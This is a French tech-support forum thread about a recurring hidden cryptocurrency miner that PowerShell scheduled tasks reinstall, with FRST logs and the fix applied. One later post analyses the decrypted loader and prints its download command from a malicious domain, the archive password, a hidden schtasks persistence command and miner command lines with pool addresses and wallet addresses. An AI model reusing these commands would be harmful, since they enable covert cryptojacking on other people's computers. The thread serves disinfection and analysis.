Trojan Miner caché [Résolu]

[alboon2000]

Bonjour,

Je me suis aperçu, en monitorant la température de mon GPU, que celui-ci était sollicité "sans raison".
Windows Defender n'a rien trouvé.
J'ai installé Malwarebytes et il m'a trouvé ceci :
- C:\windows\link.zip (riskware.CoinMiner)
- C:\windows\svshost.exe (generic malware/suspicious)
- C:\windows\svhost.exe (backdoor.bot)

(Plus quelques éléments de uTorrent, mais ce n'est pas ça car je l'utilise depuis des années)

Une fois ceci mis en quarantaine, la température est redescendue.

Sauf que...
C'est revenu le lendemain !

J'ai regardé dans les tâches et je n'ai rien vu de suspect, mais je n'y connais pas grand chose là dedans (à part un éventuel "ViGEmBusUpdater1" ?)

J'ai donc laissé tourner Malwarebytes en fond et ça m'a bloqué quelques trucs (cf pièce jointe) : essentiellement des "sites web" via le port 3389, ou 443. Je précise que le port 443 n'a jamais été ouvert dans le NAT.

https://ibb.co/xg7CCss

J'ai donc désactivé le port 3389 dans le NAT du routeur, mais du coup, plus de RDP possible.

J'ai tout scanné avec Windows Defender et Malwarebytes Anti-Malware (MBAM) (disque C, disques internes, et NAS) : RAS... Mais on m'a fait comprendre que l'utilisation de svchost.exe veut dire que le malware l'utilise à son avantage et a donc probablement infecté le registre... Comment vérifier ?

Merci !

[Malekal_morte]

Bonjour,

En effet, on ne voit rien sur la capture.
Tu peux aussi exporter le rapport MBAM en fichier texte et le fournit ici.

Suis le tutoriel FRST. ( prends le temps de lire attentivement - tout y est bien expliqué ).

Attendre la fin du scan, un message indique que l'analyse est terminée.
Télécharge et lance le scan FRST,

Trois rapports FRST seront générés :
* FRST.txt
* Shortcut
* Additionnal.txt



Envoie ces 3 rapports sur le site https://pjjoint.malekal.com/ et en retour donne les 3 liens pjjoint qui mènent aux rapports ici dans une nouvelle réponse afin que l'on puisse les consulter.

(Les liens bleus mènent à des tutoriels explicatifs pas à pas, clic dessus pour avoir les instructions plus précises à suivre).

[alboon2000]

(A venir)

[alboon2000]

Voici :
https://pjjoint.malekal.com/files.php?i ... 1b10c6r8t7
https://pjjoint.malekal.com/files.php?i ... w12y8u12e5
https://pjjoint.malekal.com/files.php?i ... 6j7e6c13m6

[angelique]

Bonjour/Bonsoir





Télécharge à coté de FRST64.EXE , PAS AILLEURS !!!!! le fichier fixlist.txt en pièce jointe en bas du message.

➯ Relance FRST64(clic droit exécuter en tant qu'administrateur) et clic sur le bouton corriger/fix
Un redémarrage peut être nécessaire (pas obligatoire).
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message avec ton commentaire.

/!\ Ce script a été établi pour cet utilisateur, il ne doit, en aucun cas, être appliqué sur un autre système, au risque de provoquer de graves dysfonctionnements et endommager Windows /!\

et refait un mbam pour vérifier ;)

[alboon2000]

Bonjour et merci ! Résultat :

Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 05-07-2023
Exécuté par alboon (06-07-2023 08:43:55) Run:1
Exécuté depuis C:\Users\alboo\Desktop
Profils chargés: alboon & Audre & arnau
Mode d'amorçage: Normal
==============================================

fixlist contenu:
*****************
CreateRestorePoint:
Task: {735C77C6-ADA3-41AD-9C3C-95A46433ED61} - System32\Tasks\MSI Task Host - Detect_Monitor => C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [491520 2023-05-09] (Microsoft Windows -> Microsoft Corporation) -> -ExecutionPolicy ByPass -WindowStyle Hidden C:\Users\alboo\AppData\Roaming\Winsoft\core.ps1
Task: {FF7B7340-7870-4A3C-9CF1-403EFDF12B98} - System32\Tasks\ViGEmBusUpdater1 => C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [491520 2023-05-09] (Microsoft Windows -> Microsoft Corporation) -> -ExecutionPolicy Bypass C:\WINDOWS\core.ps1
C:\Users\alboo\AppData\Roaming\Winsoft
S3 ew_usbccgpfilter; \SystemRoot\System32\drivers\ew_usbccgpfilter.sys [X]
U4 npcap_wifi; pas de ImagePath
S1 WinSetupMon; system32\DRIVERS\WinSetupMon.sys [X]
2021-08-01 17:02 - 2021-08-01 17:02 - 000001792 _____ () C:\Users\alboo\AppData\Local\recently-used.xbel
HKLM\SOFTWARE\Microsoft\Windows Defender: [DisableAntiSpyware] Restriction <==== ATTENTION
HKLM\SOFTWARE\Microsoft\Windows Defender: [DisableAntiVirus] Restriction <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate: Restriction <==== ATTENTION
EmptyTemp:


*****************

Le Point de restauration a été créé avec succès.
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{735C77C6-ADA3-41AD-9C3C-95A46433ED61}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{735C77C6-ADA3-41AD-9C3C-95A46433ED61}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\MSI Task Host - Detect_Monitor => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\MSI Task Host - Detect_Monitor" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{FF7B7340-7870-4A3C-9CF1-403EFDF12B98}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FF7B7340-7870-4A3C-9CF1-403EFDF12B98}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\ViGEmBusUpdater1 => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ViGEmBusUpdater1" => supprimé(es) avec succès
C:\Users\alboo\AppData\Roaming\Winsoft => déplacé(es) avec succès
HKLM\System\CurrentControlSet\Services\ew_usbccgpfilter => supprimé(es) avec succès
ew_usbccgpfilter => service supprimé(es) avec succès
HKLM\System\CurrentControlSet\Services\npcap_wifi => supprimé(es) avec succès
npcap_wifi => service supprimé(es) avec succès
HKLM\System\CurrentControlSet\Services\WinSetupMon => supprimé(es) avec succès
WinSetupMon => service supprimé(es) avec succès
C:\Users\alboo\AppData\Local\recently-used.xbel => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows Defender\\"DisableAntiSpyware"="0" => valeur restauré(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows Defender\\"DisableAntiVirus"="0" => valeur restauré(es) avec succès
HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate => supprimé(es) avec succès

=========== EmptyTemp: ==========

FlushDNS => terminé(e)
BITS transfer queue => 1310720 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 128307823 B
Java, Discord, Steam htmlcache, WinHttpAutoProxySvc/winhttp *.cache => 307802717 B
Windows/system/drivers => 1218794174 B
Edge => 0 B
Chrome => 718857115 B
Firefox => 0 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
systemprofile32 => 0 B
LocalService => 1577393581 B
NetworkService => 1578106135 B
alboo => 1824883071 B
Audre => 1874877981 B
arnau => 1890766897 B

RecycleBin => 2900227423 B
EmptyTemp: => 13.1 GB données temporaires supprimées.

================================


Le système a dû redémarrer.

==== Fin de Fixlog 08:44:15 ====

========================================================================================
Petite question bonus :
MBAM n'a rien détecté, mais bloque parfois des "sites web" type "connexion sortante", via le fichier utorrent ou déluge, bref, rien de très inquiétant je pense. Mais surtout, il y a quelquesfois un domaine wowsofts.xyz bloqué, et dans "fichier" c'est powershell.exe qui est écrit... C'est quoi ?

[angelique]

Mais surtout, il y a quelquesfois un domaine wowsofts.xyz bloqué, et dans "fichier" c'est powershell.exe qui est écrit... C'est quoi ?

c'était des taches planifiées powershell qui devaient se connecter vers wowsofts.xyz pour récupérer le dropper/malware miner , qu'on a supprimé :

Task: {735C77C6-ADA3-41AD-9C3C-95A46433ED61} - System32\Tasks\MSI Task Host - Detect_Monitor => C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [491520 2023-05-09] (Microsoft Windows -> Microsoft Corporation) -> -ExecutionPolicy ByPass -WindowStyle Hidden C:\Users\alboo\AppData\Roaming\Winsoft\core.ps1
Task: {FF7B7340-7870-4A3C-9CF1-403EFDF12B98} - System32\Tasks\ViGEmBusUpdater1 => C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [491520 2023-05-09] (Microsoft Windows -> Microsoft Corporation) -> -ExecutionPolicy Bypass C:\WINDOWS\core.ps1

ça doit plus le faire depuis la correction ?

[alboon2000]

J'ai stoppé Déluge et je regarde ce qu'il se passe, et je vous dis.

Et, en supposant que grâce à ça MBAM ne signale plus rien : est-ce que ça veut dire que lorsque ce logiciel est en fonctionnement, et sans la présence de MBAM, toutes ces tentatives seraient fructueuses ? Je n'ai pas trouvé comment regarder ce que le parefeu de Windows bloquait. Je ne sais du coup pas s'il est configuré correctement...

[angelique]

Tant que les tasks powershell étaient présentes, ça rapatriait le miner qui fesait tourner ton GPU.

Maintenant que c'est supprimé, ç'est bon

Supprime C:\FRST

[alboon2000]

Merci, je n'ai plus aucune notification de la part de MBAM maintenant

Cependant, les tâches supprimées provenaient de MSI, ou autres "trucs" a priori pas dangereux, bizarre ! Enfin bref, merci encore c'est impeccable !

[Dutchman24]

J'ai rencontré un problem similaire avec avec un GPU crypto miner Xmrig qui se trouvait dans c:\Windows dans une fichier DLhost.exe ensemble avec une ficher .bat (bb.bat). qui déclenchait un powershell script dans une dossier bluetooth.
Malware bytes avait détecté le virus et supprimé le dlhost, mais pas le bb.bat, j'ai manuellement supprimé bb.bat.
Le lendemain le fichier était revenu, donc rebelote.
Je cherché dans la planificateur de taches et j'ai trouvé 3 tache suspicieux dont un dans le dossier microsoft/windows/bluetooth un dans /wininet que j'ai supprimé et un tache qui explique pourquoi le virus est revenu.

MSI Task Host - Detect_Monitor
Action: Démarrer un programme "powershell" -ExecutionPolicy ByPass -WindowStyle Hidden C:\Users\Me\AppData\Roaming\Winsoft\core.ps1
Déclencheurs: À 15h28 le 23/08/23 - Apres déclenchement recommencer tout les 06:00 heures indéfiniment

Le dossier Winsoft est également créer le 23/08/23 et contiens 3 fichiers. - Donc taches et Dossier Winsoft à supprimer !

[Malekal_morte]

Salut,

Merci pour les infos.
C'est le même apparemment vu qu'il est présent dans le script FRST.

[Vegeta]

Je pense avoir été dans le même cas, pour ma part, semble être corrélé à l'installation de FL STUDIO téléchargé sur (site de torrent)

miner folder content.jpg

Partie 1
%appdata %Winsoft, contenant :
• core.bin
• core.ps1
• k

Le script « core.ps1 » s’occupe de déchiffrer « core.bin » à l’aide de la clé « k ».
Le contenu déchiffré, du script powershell, est ensuite exécuté à l’aide d’un « Invoke-Expression $decryptedScript » ($decryptedScript étant la variable contenant le contenu déchiffré).
Le contenu, redirigé dans un fichier txt « sample_core.txt » contient ces instructions.

Code : Tout sélectionner

Les instructions sont : 
    • test si AntiVirus autre que Windows Defender
        ◦ OUI : EXIT
        ◦ NON : CONTINUE
    • test si le site « hxxps://wowsofts.xyz/ceo » répond
        ◦ Http response = 200 : CONTINUE
        ◦ Http response!= 200 : EXIT
        ◦ Erreur (catch du Try/Catch) : EXIT
    • Recherche si les tâches planifiées sont présentes
        ◦ UninstallDeviceTask
        ◦ ViGEmBusUpdater1
    • Si elles sont présentes, on les arrête et on les supprime
    • Recherche si les processus suivants sont en cours
        ◦ svhost
        ◦ svshost
        ◦ DlHost
    • Si les processus sont en cours, on force leurs arrêts
    • Téléchargement de 7zip standalone
        ◦ hxxps://wowsofts.xyz/7za.exe → c:\windows\7za.exe
    • Téléchargement d’un fichier d’archive « zipG.zip »
        ◦ Invoke-WebRequest -Uri "hxxps://wowsofts.xyz/ceo" -OutFile c:\windows\zipG.zip
    • Utilisation de 7zip pour décompresser « zipG.zip », à l’aide du mot de passe «2JYKezj76c3Ef6bZ »
    • Fichier contenant : 
        ◦ bb.bat
        ◦ DlHost.exe
        ◦ key (fichier texte, contenant une clé)
        ◦ mid.bin
        ◦ mid.ps1
        ◦ svshost.exe
        ◦ WinRing0x64.sys
    • Suppression de « zipG.zip »
    • Suppression de « 7za.exe »
    • Exécution du batch « bb.bat »
        ◦ $batchFilePath = Join-Path -Path $outputPath -ChildPath "bb.bat"
        ◦ Start-Process -FilePath "cmd.exe" -ArgumentList "/c $batchFilePath" -Verb RunAs -WindowStyle Hidden
        ◦ Ce batch va créer une tâche planifiée, qui s’occupera de lancer « mid.ps1 »
        ◦ schtasks /Create /TN "\Microsoft\Windows\Bluetooth\UninstallDeviceTask" /SC MINUTE /MO 1 /RL HIGHEST /TR "powershell -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\WINDOWS\mid.ps1" /F
Partie 2
Lorsque la tâche planifiée «  UninstallDeviceTask » se lancera, elle va exécuter le script powershell « mid.ps1 ».
Le script va  déchiffrer « mid.bin » à l’aide de la clé « key », et exécuter ce contenu déchiffré qui est un script powershell.
Extraction du contenu dans « sample.txt ».
Ces instructions vont : 
    • Vérifier si le taskmanager est ouvert
        ◦ OUI 
            ▪ Depuis plus de 30 minutes : Fermer le taskmanager
            ▪ Si $puttyprocess a été exécuté (« dlhost.exe »)
                • OUI : Fermer/Kill le process « dlhost.exe »
            ▪ Idem pour $saashostprocess (« svshost.exe »)
                • OUI : Fermer/Kill le process « svshost.exe »
        ◦ NON
            ▪ lastState not equal « IDLE »
                • $puttyProcess = Start-Process -FilePath "DlHost.exe" -ArgumentList "-o educu.xyz:33333 --http-enabled --api-worker-id vick --http-host 127.0.0.1 --http-port 22222  --http-no-restricted --http-access-token 123" -NoNewWindow -PassThru
                • $saashostProcess = Start-Process -FilePath "svshost.exe" -ArgumentList "-a kawpow -s 	de.neoxa.herominers.com:1202 -u GWEYD3rAPcKJnnAQi9kKXSKXwnzNbfmfR2.Rigo -w 0 --api 127.0.0.1:5555" -NoNewWindow -PassThru
            ▪ lastState not equal « ACTIVE »
                • $puttyProcess = Start-Process -FilePath "DlHost.exe" -ArgumentList "--cpu-max-threads-hint=30 -o educu.xyz:33333 --http-enabled --api-worker-id vick --http-host 127.0.0.1 --http-port 22222  --http-no-restricted --http-access-token 123" -NoNewWindow -PassThru
                • $saashostProcess = Start-Process -FilePath "svshost.exe" -ArgumentList "-a radiant -s pool.woolypooly.com:3122 -u 1Q1XnAUdsewFm1EfoTW5Dkj18AwfhJA4Wt.Rigo -i 30 -w 0 --api 127.0.0.1:5555" -NoNewWindow -PassThru

[Malekal_morte]

Salut,

Si tu as besoin d'aide pour désinfecter ton PC, il faut effectuer l'analyse FRST comme demandé en début de ce sujet.
Fournir les rapports via pjjoint.

[Benjamin12345]

Bonjour à tous,

Je rencontre exactement le même problème que alboon2000.

Malwarebytes Anti-Malware (MBAM) détecte deux fichiers dangereux, et même après les avoir placés en quarantaine et supprimés, ils réapparaissent quelques heures ou le lendemain systématiquement.

Voici les fichiers détectés :
- RiskWare.CoinMiner, C:\WINDOWS\LINK.ZIP
- RiskWare.CoinMiner, C:\WINDOWS\SVSHOST.EXE
Capture d'écran :

Riskware-CoinMiner.png

J'ai également installé FRST64 et réalisé une analyse :
- FRST.txt : https://pjjoint.malekal.com/files.php?r ... 2s10h108h5
- Addition.txt : https://pjjoint.malekal.com/files.php?r ... 12d13t5r13
- Shortcut.txt : https://pjjoint.malekal.com/files.php?r ... _5f11l76j5

Pouvez-vous me venir en aide pour la suite ?

En vous remerciant d'avance,